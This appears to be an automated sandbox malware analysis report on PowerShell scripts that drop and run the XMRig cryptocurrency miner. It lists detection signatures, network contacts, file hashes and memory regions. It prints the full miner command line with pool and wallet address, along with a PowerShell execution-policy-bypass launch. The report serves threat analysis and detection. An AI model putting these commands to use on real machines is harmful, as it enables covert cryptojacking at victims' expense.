N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 31.73.42.20.in-addr.arpa udp

Files

memory/1396-0-0x00007FFD6EE63000-0x00007FFD6EE65000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ecbe4qx3.b1c.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1396-10-0x000001A9B6500000-0x000001A9B6522000-memory.dmp

memory/1396-11-0x00007FFD6EE60000-0x00007FFD6F921000-memory.dmp

memory/1396-12-0x00007FFD6EE60000-0x00007FFD6F921000-memory.dmp

memory/1396-14-0x00007FFD6EE60000-0x00007FFD6F921000-memory.dmp

memory/1396-15-0x000001A9B68D0000-0x000001A9B68E2000-memory.dmp

memory/1396-16-0x000001A9B68B0000-0x000001A9B68BA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/536-47-0x000001F6B21D0000-0x000001F6B21F0000-memory.dmp

memory/536-48-0x000001F7447A0000-0x000001F7447C0000-memory.dmp

memory/1396-50-0x00007FFD6EE63000-0x00007FFD6EE65000-memory.dmp

memory/536-49-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-51-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/1396-52-0x00007FFD6EE60000-0x00007FFD6F921000-memory.dmp

memory/536-53-0x000001F744BE0000-0x000001F744C00000-memory.dmp

memory/1396-54-0x00007FFD6EE60000-0x00007FFD6F921000-memory.dmp

memory/536-55-0x000001F744E10000-0x000001F744E30000-memory.dmp

memory/536-56-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-57-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-58-0x000001F744BE0000-0x000001F744C00000-memory.dmp

memory/536-59-0x000001F744E10000-0x000001F744E30000-memory.dmp

memory/536-60-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-61-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-62-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-63-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-64-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-65-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-66-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-67-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-68-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-69-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-70-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-71-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-72-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-73-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-74-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-75-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-76-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-77-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-78-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-79-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-80-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-81-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-82-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-83-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-84-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-85-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-86-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-87-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-88-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-89-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-90-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-91-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-92-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-93-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-94-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-95-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-96-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-97-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-98-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-99-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-100-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-101-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-102-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-103-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-104-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-105-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-106-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-107-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-108-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-109-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-110-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-111-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-112-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-113-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-114-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-115-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-116-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-117-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

memory/536-118-0x00007FF73EB50000-0x00007FF73F783000-memory.dmp

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:26

Platform

win10v2004-20240508-en

Max time kernel

1792s

Max time network

1797s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (3).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp
US 8.8.8.8:53 g.bing.com udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 204.79.197.237:443 g.bing.com tcp
NL 23.62.61.105:443 www.bing.com tcp
US 8.8.8.8:53 105.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
NL 23.62.61.105:443 www.bing.com tcp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 183.59.114.20.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 105.193.132.51.in-addr.arpa udp

Files

memory/3052-0-0x00007FFCBB043000-0x00007FFCBB045000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vt0j345w.zmt.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3052-6-0x0000029D7E9F0000-0x0000029D7EA12000-memory.dmp

memory/3052-7-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

memory/3052-12-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

memory/3052-14-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

memory/3052-15-0x0000029D7EBA0000-0x0000029D7EBB2000-memory.dmp

memory/3052-16-0x0000029D7EB80000-0x0000029D7EB8A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4416-47-0x00000224605D0000-0x00000224605F0000-memory.dmp

memory/4416-48-0x0000022461EE0000-0x0000022461F00000-memory.dmp

memory/4416-49-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-51-0x0000022461F20000-0x0000022461F40000-memory.dmp

memory/4416-50-0x0000022461F00000-0x0000022461F20000-memory.dmp

memory/4416-52-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/3052-53-0x00007FFCBB043000-0x00007FFCBB045000-memory.dmp

memory/3052-54-0x00007FFCBB040000-0x00007FFCBBB01000-memory.dmp

memory/4416-55-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-58-0x0000022461F20000-0x0000022461F40000-memory.dmp

memory/4416-57-0x0000022461F00000-0x0000022461F20000-memory.dmp

memory/4416-56-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-59-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-60-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-61-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-62-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-63-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-64-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-65-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-66-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-67-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-68-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-69-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-70-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-71-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-72-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-73-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-74-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-75-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-76-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-77-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-78-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-79-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-80-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-81-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-82-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-83-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-84-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-85-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-86-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-87-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-88-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-89-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-90-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-91-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-92-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-93-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-94-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-95-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-96-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-97-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-98-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-99-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-100-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-101-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-102-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-103-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-104-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-105-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-106-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-107-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-108-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-109-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-110-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-111-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-112-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-113-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-114-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-115-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-116-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

memory/4416-117-0x00007FF6F1F40000-0x00007FF6F2B73000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 06:28

Platform

win10-20240404-en

Max time kernel

1798s

Max time network

1798s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 27.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp

Files

memory/2076-3-0x00007FF8F61E3000-0x00007FF8F61E4000-memory.dmp

memory/2076-5-0x000002AE77EC0000-0x000002AE77EE2000-memory.dmp

memory/2076-8-0x00007FF8F61E0000-0x00007FF8F6BCC000-memory.dmp

memory/2076-9-0x000002AE78070000-0x000002AE780E6000-memory.dmp

memory/2076-10-0x00007FF8F61E0000-0x00007FF8F6BCC000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kap3zvmw.35s.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/2076-25-0x00007FF8F61E0000-0x00007FF8F6BCC000-memory.dmp

memory/2076-48-0x000002AE780F0000-0x000002AE78102000-memory.dmp

memory/2076-61-0x000002AE78050000-0x000002AE7805A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/3476-90-0x000001CBCE760000-0x000001CBCE780000-memory.dmp

memory/2076-91-0x00007FF8F61E0000-0x00007FF8F6BCC000-memory.dmp

memory/2076-92-0x00007FF8F61E3000-0x00007FF8F61E4000-memory.dmp

memory/3476-93-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/2076-94-0x00007FF8F61E0000-0x00007FF8F6BCC000-memory.dmp

memory/3476-95-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-96-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-97-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-98-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-99-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-100-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-101-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-102-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-103-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-104-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-105-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

memory/3476-106-0x00007FF69A1A0000-0x00007FF69ADD3000-memory.dmp

